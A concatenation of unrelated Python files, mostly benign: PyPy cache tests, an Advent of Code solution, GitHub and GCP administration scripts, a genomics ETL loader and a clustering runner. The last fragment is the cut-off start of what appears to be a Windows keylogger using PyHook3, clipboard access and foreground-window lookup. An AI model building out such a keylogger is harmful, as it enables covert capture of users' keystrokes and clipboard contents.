names_counters = [__pypy__.method_cache_counter(name)
for name in names]
try:
assert append_counter[0] >= 10 * len(names) - 1
for name, count in zip(names, names_counters):
assert count == (9, 1), str((name, count))
break
except AssertionError:
pass
else:
raise
def test_mutating_bases(self):
class C(object):
pass
class C2(object):
foo = 5
class D(C):
pass
class E(D):
pass
d = D()
e = E()
D.__bases__ = (C2,)
assert e.foo == 5
class F(object):
foo = 3
D.__bases__ = (C, F)
assert e.foo == 3
def test_custom_metaclass(self):
@self.retry
def run():
import __pypy__
for j in range(20):
class MetaA(type):
def __getattribute__(self, x):
return 1
def f(self):
return 42
A = type.__new__(MetaA, "A", (), {"f": f})
l = [type.__getattribute__(A, "__new__")(A)] * 10
__pypy__.reset_method_cache_counter()
for i, a in enumerate(l):
# use getattr to circumvent the mapdict cache
assert getattr(a, "f")() == 42
cache_counter = __pypy__.method_cache_counter("f")
assert sum(cache_counter) == 10
if cache_counter == (9, 1):
break
#else the moon is misaligned, try again
else:
raise AssertionError("cache_counter = %r" % (cache_counter,))
def test_mutate_class(self):
@self.retry
def run():
import __pypy__
class A(object):
x = 1
y = 2
__pypy__.reset_method_cache_counter()
a = A()
for i in range(100):
assert a.y == 2
assert a.x == i + 1
A.x += 1
cache_counter = __pypy__.method_cache_counter("x")
# XXX this is the bad case for the mapdict cache: looking up
# non-method attributes from the class
assert cache_counter[0] >= 450
assert cache_counter[1] >= 1
assert sum(cache_counter) == 500
__pypy__.reset_method_cache_counter()
a = A()
for i in range(100):
assert a.y == 2
setattr(a, "a%s" % i, i)
cache_counter = __pypy__.method_cache_counter("x")
assert cache_counter[0] == 0 # 0 hits, because all the attributes are new
|
from collections import defaultdict
def main():
with open("day_10_input.txt") as f:
input_lines = [int(x) for x in f.read().splitlines()]
adapters = [0] + sorted(input_lines)
adapters.append(adapters[-1] + 3)
differences = defaultdict(int)
for i in range(len(adapters) - 1):
differences[adapters[i + 1] - adapters[i]] += 1
print(f"Part 1: {differences[1] * differences[3]}")
connections = defaultdict(int)
connections[0] = 1
for adapter in adapters[1:]:
connections[adapter] = sum([connections[adapter - i] for i in range(1, 4)])
print(f"Part 2: {connections[adapters[-1]]}")
if __name__ == "__main__":
main()
|
from PIL import Image
import numpy as np
def pil_load_img(path):
image = Image.open(path)
# Expand the dim if gray
if image.mode is not 'RGB':
image = image.convert('RGB')
image = np.array(image)
return image
|
#!/usr/bin/python3
import requests
import json
def run(token, username, repository, collaborator):
url = f"https://api.github.com/repos/{username}/{repository}/collaborators/{collaborator}"
authorization = f"token {token}"
headers = {
"Accept": "application/vnd.github.v3+json",
"Authorization" : authorization,
}
r1 = requests.get(
url=url,
headers=headers
)
if r1.status_code == 204:
r2 = requests.delete(
url=url,
headers=headers
)
if r2.status_code == 204:
print(f"✅ Collaborator \033[36m{collaborator}\033[0m successfully removed from {username}'s \033[36m{repository}\033[0m repository")
else:
print("❌ Couldn't delete the collaborator from the repository")
print (r2.status_code, r2.reason)
else:
print(f"⚠️ Username \033[36m{collaborator}\033[0m isn't a \033[36m{repository}\033[0m repository collaborator")
|
"""VEP Transcript ETL."""
import logging
import multiprocessing
import uuid
import re
from etl import ETL
from etl.helpers import ETLHelper
from files import TXTFile
from transactors import CSVTransactor
from transactors import Neo4jTransactor
class VEPTranscriptETL(ETL):
"""VEP Transcript ETL."""
logger = logging.getLogger(__name__)
# Query templates which take params and will be processed later
vep_transcript_query_template = """
USING PERIODIC COMMIT %s
LOAD CSV WITH HEADERS FROM \'file:///%s\' AS row
MATCH (g:Transcript {primaryKey:row.transcriptId})
MATCH (a:Variant {hgvsNomenclature:row.hgvsNomenclature})
CREATE (gc:TranscriptLevelConsequence {primaryKey:row.primaryKey})
SET gc.molecularConsequences = apoc.convert.fromJsonList(row.molecularConsequences),
gc.transcriptId = g.primaryKey,
gc.variantId = a.hgvsNomenclature,
gc.impact = row.impact,
gc.aminoAcidReference = row.aminoAcidReference,
gc.aminoAcidVariation = row.aminoAcidVariation,
gc.aminoAcidChange = row.aminoAcidChange,
gc.cdnaStartPosition = row.cdnaStartPosition,
gc.cdnaEndPosition = row.cdnaEndPosition,
gc.cdnaRange = row.cdnaRange,
gc.cdsStartPosition = row.cdsStartPosition,
gc.cdsEndPosition = row.cdsEndPosition,
gc.cdsRange = row.cdsRange,
gc.proteinStartPosition = row.proteinStartPosition,
gc.proteinEndPosition = row.proteinEndPosition,
gc.proteinRange = row.proteinRange,
gc.codonChange = row.codonChange,
gc.codonReference = row.codonReference,
gc.codonVariation = row.codonVariation,
gc.hgvsProteinNomenclature = row.hgvsProteinNomenclature,
gc.hgvsCodingNomenclature = row.hgvsCodingNomenclature,
gc.hgvsVEPGeneNomenclature = row.hgvsVEPGeneNomenclature,
gc.polyphenPrediction = row.polyphenPrediction,
gc.polyphenScore = row.polyphenScore,
gc.siftPrediction = row.siftPrediction,
gc.siftScore = row.siftScore
CREATE (g)-[ggc:ASSOCIATION {primaryKey:row.primaryKey}]->(gc)
CREATE (a)-[ga:ASSOCIATION {primaryKey:row.primaryKey}]->(gc)
CREATE (g)-[gv:ASSOCIATION {primaryKey:row.primaryKey}]->(a)
CREATE (p:VariantProteinSequence {primaryKey:row.variantProteinSequenceKey})
SET p.proteinSequence = row.variantProteinSequence
SET p.variantId = row.hgvsNomenclature
SET p.transcriptId = row.transcriptId
CREATE (a)-[ps:PROTEIN_SEQUENCE]->(p)
MERGE(syn:Synonym:Identifier {primaryKey:row.hgvsVEPGeneNomenclature})
SET syn.name = row.hgvsVEPGeneNomenclature
MERGE (a)-[aka2:ALSO_KNOWN_AS]->(syn)
"""
def __init__(self, config):
"""Initialise object."""
super().__init__()
self.data_type_config = config
def _load_and_process_data(self):
thread_pool = []
for sub_type in self.data_type_config.get_sub_type_objects():
process = multiprocessing.Process(
target=self._process_sub_type, args=(sub_type,))
process.start()
thread_pool.append(process)
ETL.wait_for_threads(thread_pool)
def _process_sub_type(self, sub_type):
self.logger.info("Loading VEP Data: %s", sub_type.get_data_provider())
commit_size = self.data_type_config.get_neo4j_commit_size()
filepath = sub_type.get_filepath()
# This needs to be in this format (template, param1, params2) others will be ignored
query_template_list = [
[self.vep_transcript_query_template, commit_size,
"vep_transcript_data_" + sub_type.get_data_provider() + ".csv"]
]
# Obtain the generator
generators = self.get_generators(filepath, sub_type.get_data_provider())
query_and_file_list = self.process_query_params(query_template_list)
CSVTransactor.save_file_static(generators, query_and_file_list)
Neo4jTransactor.execute_query_batch(query_and_file_list)
self.error_messages("VEPTran-{}: ".format(sub_type.get_data_provider()))
def return_range_split_values(self, column):
"""Get range vaues."""
if "-" in column:
if column == '-':
start = ""
end = ""
ranger = ""
else:
start = column.split("-")[0]
end = column.split("-")[1]
ranger = column
elif "/" in column:
if column == '/':
start = ""
end = ""
ranger = ""
else:
start = column.split("/")[0]
end = column.split("/")[1]
ranger = column
else:
start = column
end = column
ranger = column
return start, end, ranger
def get_generators(self, filepath, data_provider): # noqa Needs simplyfying
"""Get Generators."""
data = TXTFile(filepath).get_data()
vep_maps = []
prot_func_regex = re.compile(r'^([^\(]+)\(([\d\.]+)\)')
for line in data:
impact = ''
hgvs_p = ''
hgvs_c = ''
hgvs_g = ''
pph_prediction = ''
pph_score = ''
sift_prediction = ''
sift_score = ''
variant_protein_sequnece = ''
transcript_wt_sequence = ''
columns = line.split()
if line.startswith('#'):
self.logger.warning(line)
reg = re.compile(r'## Output produced at (.*)')
match = reg.match(line)
if match:
date_produced = match.group(1)
ETLHelper.load_release_info_from_args(logger=self.logger, provider=data_provider, sub_type='VEPTRANSCRIPT', date_produced=date_produced)
continue
notes = columns[13]
kvpairs = notes.split(";")
if kvpairs is not None:
for pair in kvpairs:
key = pair.split("=")[0]
value = pair.split("=")[1]
if key == 'IMPACT':
impact = value
elif key == 'HGVSp':
hgvs_p = value.replace("%3D", "=")
elif key == 'HGVSc':
hgvs_c = value
elif key == 'HGVSg':
hgvs_g = value
elif key == 'PolyPhen':
m = prot_func_regex.match(value)
pph_prediction = m.group(1)
pph_score = m.group(2)
elif key == 'SIFT':
m = prot_func_regex.match(value)
sift_prediction = m.group(1)
sift_score = m.group(2)
elif key == 'VarSeq':
variant_protein_sequnece = value
elif key == 'WtSeq':
transcript_wt_sequence = value
if columns[3].startswith('Gene:'):
gene_id = columns[3].lstrip('Gene:')
else:
gene_id = columns[3]
cdna_start_position, cdna_end_position, cdna_range = self.return_range_split_values(
columns[7]
)
cds_start_position, cds_end_position, cds_range = self.return_range_split_values(
columns[8]
)
protein_start_position, protein_end_position, protein_range = self.return_range_split_values(
columns[9]
)
amino_acid_reference, amino_acid_variation, amino_acid_change = self.return_range_split_values(
columns[10]
)
codon_reference, codon_variation, codon_change = self.return_range_split_values(
columns[11]
)
transcript_id = columns[4]
hgvsNomenclature = columns[0]
vep_result = {"hgvsNomenclature": hgvsNomenclature,
"molecularConsequences": columns[6].split(","),
"primaryKey": str(uuid.uuid4()),
"impact": impact,
"hgvsProteinNomenclature": hgvs_p,
"hgvsCodingNomenclature": hgvs_c,
"hgvsVEPGeneNomenclature": hgvs_g,
"gene": gene_id,
"transcriptId": transcript_id,
"aminoAcidReference": amino_acid_reference,
"aminoAcidVariation": amino_acid_variation,
"aminoAcidChange": amino_acid_change,
"cdnaStartPosition": cdna_start_position,
"cdnaEndPosition": cdna_end_position,
"cdnaRange": cdna_range,
"cdsStartPosition": cds_start_position,
"cdsEndPosition": cds_end_position,
"cdsRange": cds_range,
"proteinStartPosition": protein_start_position,
"proteinEndPosition": protein_end_position,
"proteinRange": protein_range,
"codonReference": codon_reference,
"codonVariation": codon_variation,
"codonChange": codon_change,
"polyphenPrediction": pph_prediction,
"polyphenScore": pph_score,
"siftPrediction": sift_prediction,
"siftScore": sift_score,
"variantProteinSequence": variant_protein_sequnece,
"variantProteinSequenceKey": transcript_id+hgvsNomenclature,
"transcriptWtSequence": transcript_wt_sequence,
"transcriptProteinSequenceKey": transcript_id+"Protein"
}
vep_maps.append(vep_result)
yield [vep_maps]
|
from algorithms.configuration.configuration import Configuration
from algorithms.algorithm_manager import AlgorithmManager
from maps.map_manager import MapManager
from algorithms.lstm.trainer import Trainer
from analyzer.analyzer import Analyzer
from generator.generator import Generator
from simulator.services.debug import DebugLevel
from simulator.services.services import Services
from simulator.simulator import Simulator
from utility.misc import flatten
from utility.argparse import add_configuration_flags
import copy
import sys
import os
import argparse
from typing import List, Callable
class MainRunner:
main_services: Services
def __init__(self, configuration: Configuration) -> None:
self.main_services: Services = Services(configuration)
self.run = self.main_services.debug.debug_func(DebugLevel.BASIC)(self.run)
def run(self) -> None:
if self.main_services.settings.generator:
Generator.main(self)
if self.main_services.settings.trainer:
Trainer.main(self)
if self.main_services.settings.analyzer:
Analyzer.main(self)
if self.main_services.settings.load_simulator:
simulator: Simulator = Simulator(self.main_services)
simulator.start()
if self.main_services.settings.clear_cache:
self.main_services.resources.cache_dir.clear()
def arg_valid(attr: str, args: argparse.Namespace) -> bool:
if not getattr(args, attr):
print("Invalid argument, {} is not enabled".format(attr), file=sys.stderr)
return False
return True
def configure_generator(config: Configuration, args: argparse.Namespace) -> bool:
if args.generator:
config.generator = True
if args.room_size:
if not arg_valid("generator", args):
return False
config.generator_min_room_size = args.room_size[0]
config.generator_max_room_size = args.room_size[1]
if args.fill_rate:
if not arg_valid("generator", args):
return False
config.generator_obstacle_fill_min = args.fill_rate[0]
config.generator_obstacle_fill_max = args.fill_rate[1]
if args.generatortype:
if not arg_valid("generator", args):
return False
config.generator_gen_type = args.generatortype
if args.num_maps:
if not arg_valid("generator", args):
return False
config.generator_nr_of_examples = args.num_maps
return True
def configure_analyzer(config: Configuration, args: argparse.Namespace) -> bool:
if args.analyzer:
config.analyzer = True
return True
def configure_trainer(config: Configuration, args: argparse.Namespace) -> bool:
if args.trainer:
config.trainer = True
return True
def configure_visualiser(config: Configuration, args: argparse.Namespace) -> bool:
if args.visualiser:
config.load_simulator = True
config.simulator_graphics = True
if args.visualiser_flags is not None and not arg_valid("visualiser", args):
return False
return True
def configure_common(config: Configuration, args: argparse.Namespace) -> bool:
# for generator & analyzer
config.num_dim = args.dims
if args.include_builtin_algorithms:
config.algorithms.update(AlgorithmManager.builtins)
if args.list_maps:
print("Available maps:")
for key in MapManager.builtins.keys():
print(f" {key}")
print("Can also specify a custom map,")
print(" (1) cached map stored in Maps")
print(" (2) external file that contains a global variable with type that inherits from Map")
sys.exit(0)
if args.maps:
maps = MapManager.load_all(args.maps)
if not all(maps):
invalid_maps = [args.maps[i] for i in range(len(maps)) if not maps[i]]
invalid_str = ",".join('"' + a + '"' for a in invalid_maps)
valid_str = ",".join('"' + a + '"' for a in MapManager.builtins.keys())
print(f"Invalid map(s) specified: {invalid_str}", file=sys.stderr)
print(f"Available maps: {valid_str}", file=sys.stderr)
print("Can also specify a custom map,", file=sys.stderr)
print(" (1) cached map stored in Maps", file=sys.stderr)
print(" (2) external file that contains a global variable with type that inherits from Map", file=sys.stderr)
return False
maps = list(flatten(maps, depth=1))
# name uniqueness
names = [a[0] for a in maps]
if len(set(names)) != len(names):
print("Name conflict detected in custom map list:", names, file=sys.stderr)
return False
maps = dict(maps)
if args.include_default_builtin_maps or args.include_all_builtin_maps:
maps.update(MapManager.builtins)
if args.include_all_builtin_maps:
maps.update(MapManager.cached_builtins)
config.maps = maps
elif args.include_all_builtin_maps:
config.maps.update(MapManager.cached_builtins)
return True
def configure_and_run(args: argparse.Namespace, configurers: List[Callable[[Configuration, argparse.Namespace], bool]]):
config = Configuration()
for c in configurers:
if not c(config, args):
return False
if not configure_common(config, args) or \
not configure_generator(config, args) or \
not configure_analyzer(config, args) or \
not configure_trainer(config, args) or \
not configure_visualiser(config, args):
return False
mr = MainRunner(config)
mr.run()
return True
def main() -> bool:
parser = argparse.ArgumentParser(prog="main.py",
description="PathBench runner",
formatter_class=argparse.RawTextHelpFormatter)
configurers: List[Callable[[Configuration, argparse.Namespace], bool]] = []
# Run arguments
parser.add_argument("-v", "--visualiser", action='store_true', help="run visualiser (simulator with graphics)")
parser.add_argument("-g", "--generator", action='store_true', help="run generator")
parser.add_argument("-t", "--trainer", action='store_true', help="run trainer")
parser.add_argument("-a", "--analyzer", action='store_true', help="run analyzer")
# Visualiser arguments
configurers.append(add_configuration_flags(parser, visualiser_flags=True, help_prefix="[visualiser] "))
# Generator arguments
parser.add_argument("--room-size", nargs=2, type=int, help="[generator] min/max room size, in format \"min max\"")
parser.add_argument("--fill-rate", nargs=2, type=float, help="[generator] min/max fill rate in random fill rooms")
parser.add_argument("--generatortype", choices=list(Generator.AVAILABLE_GENERATION_METHODS), help="[generator] generator type")
parser.add_argument("--num-maps", type=int, help="[generator] number of maps to generate")
# Miscellaneous
parser.add_argument("--dims", type=int, help="[generator|analyzer] number of dimensions", default=3)
configurers.append(add_configuration_flags(parser, algorithms_flags=True, multiple_algorithms_specifiable=True, help_prefix="[visualiser|analyzer] "))
parser.add_argument("--include-builtin-algorithms", action='store_true',
help="[visualiser|analyzer] include all builtin algorithms even when a custom list is provided via '--algorithms'")
parser.add_argument("--maps", help="[visualiser|analyzer|trainer] maps to load (either built-in map name or module file path)", nargs="+")
parser.add_argument("--include-all-builtin-maps", action='store_true',
help="[visualiser|analyzer|trainer] include all builtin maps (includes all cached maps) even when a custom list is provided via '--maps'")
parser.add_argument("--include-default-builtin-maps", action='store_true',
help="[visualiser|analyzer|trainer] include default builtin maps (does not include all cached maps) even when a custom list is provided via '--maps'")
parser.add_argument("--list-maps", action="store_true", help="[visualiser|analyzer|trainer] output list of available built-in maps")
configurers.append(add_configuration_flags(parser, deterministic_flags=True, debug_flag=True))
args = parser.parse_args()
print("args:{}".format(args))
return configure_and_run(args, configurers)
if __name__ == "__main__":
ret = main()
exit_code = 0 if ret else 1
sys.exit(exit_code)
|
from google.cloud import storage
from google.cloud import bigquery
from google.cloud import pubsub_v1
import subprocess as sp
def replace_tokens_in_config_files(map_token_value, map_template_to_config, f_log):
for (tf,cf) in map_template_to_config:
with open(tf, "r") as h:
tf_content = h.read()
for (t,v) in map_token_value:
tf_content = tf_content.replace("{{"+t+"}}", v)
with open(cf, "w+") as h:
h.write(tf_content)
return
def deploy_appengine_app(app_yaml, region, cwd, f_log):
log("---", f_log)
log("deploy_appengine_app()", f_log)
cmd = [
"gcloud", "app", "create", "--region", region
]
res = sp.Popen(cmd,
stdout=f_log,
stderr=f_log,
cwd=cwd
).communicate()
cmd = [
"gcloud", "-q", "app", "deploy", app_yaml
]
res = sp.Popen(cmd,
stdout=f_log,
stderr=f_log,
cwd=cwd
).communicate()
log("---", f_log)
return
def deploy_endpoints_api(openapi_yaml, cwd, f_log):
log("---", f_log)
log("deploy_endpoints_api()", f_log)
cmd = [
"gcloud", "endpoints", "services", "deploy", openapi_yaml
]
res = sp.Popen(cmd,
stdout=f_log,
stderr=f_log,
cwd=cwd
).communicate()
log("---", f_log)
return
def deploy_cloud_functions(cloud_functions, cwd, f_log):
log("---", f_log)
log("deploy_cloud_functions()", f_log)
for cf in cloud_functions:
cmd = [
"gcloud", "functions", "deploy",
cf["name"],
"--region", cf["region"],
"--source", cf["source"],
"--runtime", cf["runtime"]
]
trigger = cf["trigger"]
if trigger["type"] == "http":
cmd += ["--trigger-http"]
elif trigger["type"] == "topic":
cmd += [
"--trigger-topic", trigger["topic-name"]
]
elif trigger["type"] == "bucket":
cmd += [
"--trigger-resource", trigger["bucket-name"],
"--trigger-event", trigger["event-type"]
]
else:
raise Exception("unknown trigger type")
if "env-vars" in cf:
cmd += [
"--set-env-vars",
",".join(
"{k}={v}".format(k=k, v=v)
for (k, v)
in cf["env-vars"].items()
)]
res = sp.Popen(cmd,
stdout=f_log,
stderr=f_log,
cwd=cwd
).communicate()
log("---", f_log)
return
def create_pubsub_topics(project_id, topics, f_log):
log("---", f_log)
log("create_pubsub_topics()", f_log)
client = pubsub_v1.PublisherClient()
for t in topics:
topic_path = client.topic_path(project=project_id, topic=t["name"])
try:
client.get_topic(topic=topic_path)
log("PubSub tobic '{t}' already exists.".format(t=topic_path), f_log)
except:
client.create_topic(topic_path)
log("PubSub tobic '{t}' created.".format(t=topic_path), f_log)
log("---", f_log)
return
def create_bigquery_tables(project_id, tables, f_log):
log("---", f_log)
log("create_bigquery_tables()", f_log)
client = bigquery.Client()
for t in tables:
dataset_id = t["dataset-id"]
full_table_id = "{p}.{d}.{t}".format(
p=project_id,
d=dataset_id,
t=t["id"]
)
cols = t["columns"]
schema = [
bigquery.SchemaField(
col["name"],
col["type"],
mode=col["mode"]
) for col in cols
]
if t["id"] in [t.table_id for t in client.list_tables(dataset_id)]:
log("BigQuery table '{t}' exists already.".format(t=t["id"]), f_log)
else:
table = bigquery.Table(full_table_id, schema=schema)
client.create_table(table)
log("BigQuery table '{t}' created.".format(t=t["id"]), f_log)
log("---", f_log)
return
def create_bigquery_datasets(datasets, f_log):
log("---", f_log)
log("create_bigquery_datasets()", f_log)
client = bigquery.Client()
for ds in datasets:
if ds["id"] in [ds.dataset_id for ds in client.list_datasets()]:
log("BigQuery dataset '{ds}' exists already.".format(ds=ds["id"]), f_log)
else:
dataset_ref = client.dataset(ds["id"])
dataset = bigquery.Dataset(dataset_ref)
client.create_dataset(dataset)
log("BigQuery dataset '{ds}' created.".format(ds=ds["id"]), f_log)
log("---", f_log)
return
def create_storage_bucket(name, location, f_log):
log("---", f_log)
log("create_storage_bucket()", f_log)
client = storage.Client()
if name in [b.name for b in client.list_buckets()]:
b = client.get_bucket(name)
b.delete_blobs(blobs=b.list_blobs())
log("Storage bucket '{b}' exists already. Bucket was emptied.".format(b=name), f_log)
else:
b = storage.Bucket(client=client)
b.name = name
b.create(location=location)
log("Storage bucket '{b}' created.".format(b=name), f_log)
log("---", f_log)
return
def log(text, f):
f.write(text + "\n")
f.flush()
|
from __future__ import division, print_function, absolute_import
import os
import logging
import numpy as np
from PIL import Image
from tensorflow.contrib.learn.python.learn.datasets import mnist
from tensorflow.python.framework import dtypes
from tensorflow.contrib.learn.python.learn.datasets import base
# The ConvertImg function open image saved in imgFolder
# Image size is set as 512*512 squared. If your raw image size differs to this one, you have to compress it first.
def ConvertImg(imgFolder):
RawImgSize = (512,512)
if os.path.isdir(imgFolder) is False:
logging.warning('Raw image folder doesn\'t exist')
train_directory = os.path.join(imgFolder)
all_entries = os.listdir(train_directory)
dirnames = []
for entry in all_entries:
if os.path.isdir(os.path.join(train_directory, entry)):
dirnames.append(entry)
arr = []
label = []
for dirname in dirnames:
files = os.listdir(os.path.join(train_directory, dirname))
for file in files:
# read file as gray image
img = Image.open(os.path.join(train_directory, dirname,file)).convert('L')
if img.size[0] != RawImgSize[0] or img.size[1] != RawImgSize[1]:
print('Error on Image Size != ', RawImgSize)
else:
# Label vector is generated from folder name. It add one label(folder name) to 'label'
label.append(dirname)
for i in range(RawImgSize[0]):
for j in range(RawImgSize[1]):
pixel = float(img.getpixel((j, i)))
arr.append(pixel)
# 'arr' is 1D vector. reshape arr to #file * imageRow * imageCol * 1 numpy array.
# Then combine with label by mnist default class 'DataSet'
# return the MNIST-like dataset
train_labels = np.array(label)
train_images = np.array(arr).reshape((len(label),RawImgSize[0], RawImgSize[1],1))
dtype=dtypes.float32
reshape=True
seed=None
options = dict(dtype=dtype, reshape=reshape, seed=seed)
mnData = mnist.DataSet(train_images, train_labels, **options)
return mnData
|
#组成整体的交通控制器,包括具体的交通信号等控制细节
import RLmind
import torch.nn.Variable as Variable
import numpy as np
import traci
|
from django.db import models
from django.contrib.postgres.fields import JSONField, ArrayField
from users.models import User
from django.contrib.auth.models import Group
from django.conf import settings
from asset.models import Host, HostGroup
class Line(models.Model):
name = models.CharField(max_length=255, unique=True, verbose_name=u"产品线")
date_created = models.DateTimeField(verbose_name=u'创建时间', auto_now_add=True)
date_updated = models.DateTimeField(verbose_name=u'更新时间', auto_now=True)
def __str__(self):
return self.name
class Project(models.Model):
name = models.CharField(max_length=255, null=True)
user = models.ManyToManyField(User)
user_group = models.ForeignKey(Group, null=True, on_delete=models.SET_NULL)
host_group = models.ForeignKey(HostGroup, null=True, on_delete=models.SET_NULL)
sls = models.FilePathField(path=settings.SALT_STATE_DIRECTORY,
allow_files=False, allow_folders=True, recursive=True)
description = models.TextField(null=True)
tags = ArrayField(models.CharField(max_length=255), default=list)
status = models.IntegerField(null=True)
line = models.ForeignKey(Line, null=True, related_name=u"business", verbose_name=u"产品线",
on_delete=models.SET_NULL)
date_created = models.DateTimeField(verbose_name=u'创建时间', auto_now_add=True)
date_updated = models.DateTimeField(verbose_name=u'更新时间', auto_now=True)
def __str__(self):
return self.name
|
import itertools
import json
import os
import shutil
import time
from math import factorial
from tqdm import trange, tqdm
from clusterapp.core import evaluate
from clusterapp.utils import build_library, format_table, std_out_err_redirect_tqdm
def export(names, labels_pred, filename):
result = {}
for name, label in zip(names, map(str, labels_pred)):
category = result.get(label, [])
category.append(name)
result[label] = category
with open(filename, 'w') as file:
json.dump(result, file)
def log(line, log_file):
print(line)
log_file.write('%s\n' % line)
def mark_best_features(reports):
best = {}
for report in reports:
for line in report:
if line[1] == 'ALGORITHM':
continue
algorithm = line[1]
score = float(line[2])
b = best.get(algorithm, {
'score': -2 ** 31,
'line': line
})
best[algorithm] = b
if score > b['score']:
b['score'] = score
b['line'][0] = ' '
b['line'] = line
line[0] = '*'
def report_algorithm(algorithm, X, labels_pred, labels_true, run_id):
start = time.time()
score = evaluate(X, labels_pred, labels_true)
if CLASSIFIED:
measures = ['AMI', 'ARI', 'Homogeneity', 'Completeness']
else:
measures = ['Silhouette', 'Calinski-Harabaz']
return list(map(str, [
'',
algorithm,
*[score[measure] for measure in measures],
round(time.time() - start, 2),
run_id
]))
def run(args):
global LIBRARY, CLASSIFIED, EXPORT
LIBRARY = build_library(args.path, args.classified)
CLASSIFIED = args.classified
EXPORT = args.export
with open(args.config) as config:
config = json.load(config)
features = config.get('features')
n_clusters = config.get('n_clusters', 2)
categories = config.get('categories', getattr(LIBRARY, 'categories', None))
export_path = config.get('export_path', '')
shutil.rmtree(export_path, ignore_errors=True)
os.makedirs(export_path, exist_ok=True)
test(
features_set=features,
min_features=config.get('min_features', 1),
max_features=config.get('max_features', len(features)),
algorithms=config.get('algorithms'),
categories=(categories or n_clusters),
export_path=export_path
)
def test(features_set, min_features, max_features, algorithms, categories, export_path):
n = len(features_set)
reports = []
features_combinations = []
i = 0
with std_out_err_redirect_tqdm() as orig_stdout:
sizes = trange(
min_features,
max_features + 1,
desc='Checking subsets of features',
file=orig_stdout,
dynamic_ncols=True
)
for r in sizes:
k = factorial(n) / (factorial(r) * factorial(n - r))
combinations = tqdm(
itertools.combinations(features_set, r),
total=int(k),
desc='Checking subsets of size %d' % r,
file=orig_stdout,
dynamic_ncols=True,
leave=False
)
for features in combinations:
if CLASSIFIED:
report = [
(' ', 'ALGORITHM', 'AMI', 'ARI', 'HOMOGENEITY', 'COMPLETENESS', 'TIME', 'ID')
]
else:
report = [
(' ', 'ALGORITHM', 'SILHOUETTE', 'CALINSKI-HARABAZ', 'TIME', 'ID')
]
for algorithm in algorithms:
try: # TODO remove this try-except
X, scaled_X, names, labels_pred, labels_true = LIBRARY.predict(
categories=categories,
n_categories=categories if isinstance(categories, int) else len(categories),
features=features,
algorithm=algorithm
)
except:
print('Error extracting features: %s' % str(features))
continue
report.append(report_algorithm(algorithm, scaled_X, labels_pred, labels_true, i))
if EXPORT:
export(
names,
labels_pred,
os.path.join(export_path, '%d.json' % i)
)
i += 1
reports.append(report)
features_combinations.append(features)
print()
mark_best_features(reports)
with open(os.path.join(export_path, 'log.txt'), 'w') as log_file:
for features, report in zip(features_combinations, reports):
log('%s' % str(features), log_file)
log(format_table(report), log_file)
|
"""
This example will ask you to select an Org, then a string, searching for all App families which contain that string in their name.
Only App families for which the Org has an active entitlement are shown.
It then prints the contained app versions with their type (interactive/compute) and app id.
These app ids can be used during sessions.start_session and compute.make_job_request.
Tested with Python 2.7.15, 3.7.1.
"""
import sys
import common
from athera.api import apps
from six.moves import input
class AppSearcher(object):
def __init__(self, logger, base_url, group_id, token):
self.logger = logger
self.base_url = base_url
self.group_id = group_id
self.token = token
def search_families(self, target):
self.logger.info("Searching families for {}".format(target))
apps_response = apps.get_app_families(self.base_url, self.group_id, self.token)
apps_dict = common.convert_response(apps_response)
if not apps_dict or 'families' not in apps_dict:
return None
# response contains one field:
# 'families'
apps_list = apps_dict['families']
# Filter the whole list with the supplied search term, case-insensitive
return list(filter(lambda x:target.lower() in x['name'].lower(), apps_list))
def main():
logger = common.setup_logging()
# What are we going to do?
logger.info(__doc__)
# Determine some arguments we need for api calls
base_url = common.get_base_url()
token = common.get_token_from_env()
if not token:
logger.fatal("ATHERA_API_TOKEN not set in env")
sys.exit(1)
# API calls all need an active group to define the 'Context' of the request. We only care about the top-level groups, orgs. Ask for user input.
selector = common.GroupSelector(logger, base_url, token)
group_id = selector.get_org()
if not group_id:
sys.exit(2)
# Feed this into the class which will query the app_families endpoint
searcher = AppSearcher(logger, base_url, group_id, token)
# Fetch the search term
target = input("-- Enter the app name (or part of) to search for: ")
# Run the search
families = searcher.search_families(target)
if families:
# List comprehension to filter bundled. Bundled apps are legacy and should not be used
result = list(filter(lambda f: 'Bundled' not in f['name'], families))
if len(result) == 0:
logger.info("-- No apps found (bundled apps are ignored)")
# Pretty-print the output
for f in result:
logger.info("{:50} {}".format(f['name'], f['id']))
if 'apps' not in f:
logger.error("Missing apps data")
continue
apps = f['apps']
interactive_app = apps['interactive'] if 'interactive' in apps else None
compute_app = apps['compute'] if 'compute' in apps else None
if interactive_app:
for k, v in interactive_app.items():
logger.info("-- interactive {:35} {}".format(k, v))
if compute_app:
for k, v in compute_app.items():
logger.info("-- compute {:35} {}".format(k, v))
if __name__=="__main__":
main()
|
from localite.flow.ext import EXT
from localite.flow.loc import LOC
from localite.flow.mrk import MRK
from localite.flow.ctrl import CTRL
from localite.flow.payload import Queue
from localite.flow.ext import push
from subprocess import Popen, PIPE
import time
from typing import Tuple
def start_threaded(
loc_host: str, loc_port: int = 6666, address: Tuple[str, int] = ("127.0.0.1", 6667)
):
"""starts the whole flow-pipeline as threads within the local process
args
----
loc_host: str
the ip-adress of the localite PC
loc_port: int = 6666
the port of the localite Server
ext: Tuple[str, int] ("127.0.0.1", 6667)
the host:port where the localite-flow server will be setup
"""
queue = Queue()
locbox = Queue()
mrkbox = Queue()
ext = EXT(host=address[0], port=address[1], queue=queue)
ctrl = CTRL(queue=queue, loc=locbox, mrk=mrkbox)
loc = LOC(outbox=queue, inbox=locbox, address=(loc_host, loc_port))
mrk = MRK(mrk=mrkbox)
mrk.start()
loc.start()
loc.await_running()
mrk.await_running()
ctrl.start()
ctrl.await_running()
ext.start()
ext.await_running()
def kill(ext: Tuple[str, int] = ("127.0.0.1", 6667)):
""" kill the localite-flow at the given address, whether it runs as a subprocess or in a local thread
args
----
ext: Tuple[str, int] = ("127.0.0.1", 6667)
the host:port where the localite-flow server was setup
"""
push("cmd", "poison-pill", host=ext[0], port=ext[1])
def start(host: str):
"""starts the localite-flow as a subprocess
You can stop the subprocess gracefully using :meth:`~localite.flow.mitm.kill`
args
----
host: str
the ip adress of the localite PC
"""
from localite.flow.ext import available
p = Popen(["localite-flow", "--host", host], stderr=PIPE, stdout=PIPE)
print("[", end="")
while not available(): # pragma no cover
print(".", end="")
time.sleep(0.5)
print("]")
return p
|
from .structured_data import StructuredData
class WellInterface(StructuredData):
"""Place Holder for well specific data operations"""
pass
|
from ctypes import *
import pythoncom
import PyHook3
import win32clipboard
user32 = windll.user32
kernel32 = windll.kernel32
psapi = windll.psapi
current_window = None
#
def get_current_process():
# 获取最上层的窗口句柄
hwnd = user32.GetForegroundWindow()
# 获取进程ID
